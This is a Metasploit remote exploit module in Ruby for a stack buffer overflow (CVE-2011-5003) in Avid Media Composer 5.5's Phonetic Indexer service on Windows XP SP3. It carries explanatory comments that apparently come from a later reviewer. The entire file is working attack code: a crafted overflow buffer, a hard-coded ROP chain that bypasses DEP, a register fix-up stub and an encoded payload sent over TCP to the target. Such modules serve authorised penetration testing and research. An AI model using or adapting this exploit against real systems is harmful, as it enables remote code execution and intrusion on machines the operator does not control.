##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote exploit module for the stack buffer overflow in AvidPhoneticIndexer.exe
# (Avid Media Composer 5.5), tracked as CVE-2011-5003 / OSVDB 77376 per the
# References below. There is a single target (Windows XP Professional SP3) and
# every address the module uses -- the target 'Ret' and the gadget list in
# #exploit -- is absolute, so it is tied to the exact binaries that target
# entry describes.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. RPORT defaults to 4659; the Description
  # notes the daemon may instead listen on 4660 when started standalone.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",
        'Description' => %q{
          This module exploits a stack buffer overflow in process
          AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer
          5.5 Editing Suite. This daemon sometimes starts on a different port; if you start
          it standalone it will run on port 4660.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          # NOTE(review): the contact reads "[email protected]", which looks like a
          # rendering artifact of the page this listing was copied from -- compare with upstream.
          'vt [[email protected]]',
        ],
        'References' => [
          ['CVE', '2011-5003'],
          ['OSVDB', '77376'],
          [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf' ],
        ],
        # Payload constraints: 1012 bytes, the listed bytes excluded, no NOP sled,
        # alphanumeric-mixed encoding with EAX as the buffer register (the
        # bufregfix stub in #exploit is what sets EAX before the payload runs).
        'Payload' => {
          'Space' => 1012,
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'DisableNops' => true,
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' =>
            {
              'BufferRegister' => 'EAX',
            }
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows XP Professional SP3',
            {
              # Absolute address; only valid for the il.dll build on this target.
              'Ret' => 0x028B35EB # ADD ESP, 1800; RET (il.dll)
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-11-29',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(4659),
      ]
    )
  end

  # Builds the request and sends it over the TCP connection, then hands off to
  # the payload handler. Layout, in order: 216 bytes of random upper-case
  # filler, the target return address, 732 bytes of 'A' padding, the ROP chain,
  # the two-instruction EAX fix-up, a short jump over 9 more filler bytes, and
  # the encoded payload. Byte offsets are load-bearing: changing the length of
  # any segment shifts everything after it.
  def exploit
    # Gadget addresses are absolute (see the target note in #initialize); they
    # are serialized below as 32-bit little-endian dwords.
    rop_gadgets = [
      # ROP chain (sayonara) courtesy of WhitePhosphorus (thanks guys!)
      # a non-sayonara ROP would be super easy too, I'm just lazy :)
      0x7C344CC1, # pop eax;ret;
      0x7C3410C2, # pop ecx;pop ecx;ret;
      0x7C342462, # xor chain; call eax {0x7C3410C2}
      0x7C38C510, # writeable location for lpflOldProtect
      0x7C365645, # pop esi;ret;
      0x7C345243, # ret;
      0x7C348F46, # pop ebp;ret;
      0x7C3487EC, # call eax
      0x7C344CC1, # pop eax;ret;
      0xfffffbfc, # {size}
      0x7C34D749, # neg eax;ret; {adjust size}
      0x7C3458AA, # add ebx, eax;ret; {size into ebx}
      0x7C3439FA, # pop edx;ret;
      0xFFFFFFC0, # {flag}
      0x7C351EB1, # neg edx;ret; {adjust flag}
      0x7C354648, # pop edi;ret;
      0x7C3530EA, # mov eax,[eax];ret;
      0x7C344CC1, # pop eax;ret;
      0x7C37A181, # (VP RVA + 30) - {0xEF adjustment}
      0x7C355AEB, # sub eax,30;ret;
      0x7C378C81, # pushad; add al,0xef; ret;
      0x7C36683F, # push esp;ret;
    ].pack("V*")

    # need to control a buffer reg for the msf gen'd payload to fly. in this case:
    # Points EAX at ESP+0x10 -- presumably the start of the encoded payload,
    # which the AlphanumMixed encoder expects in its BufferRegister (EAX).
    bufregfix = "\x8b\xc4" # MOV EAX,ESP
    bufregfix += "\x83\xc0\x10" # ADD EAX,10

    connect
    # Mutable literal on purpose: it is appended to with << below, so a
    # frozen_string_literal magic comment would break this method.
    sploit = ''
    sploit << rand_text_alpha_upper(216)
    sploit << [target.ret].pack('V*')
    sploit << "A" * 732 # This avoids a busted LoadLibrary
    sploit << rop_gadgets
    sploit << bufregfix
    sploit << "\xeb\x09" # short jump over the 9 filler bytes that follow
    sploit << rand_text_alpha_upper(9)
    sploit << payload.encoded
    sock.put(sploit)
    handler
    disconnect
  end
end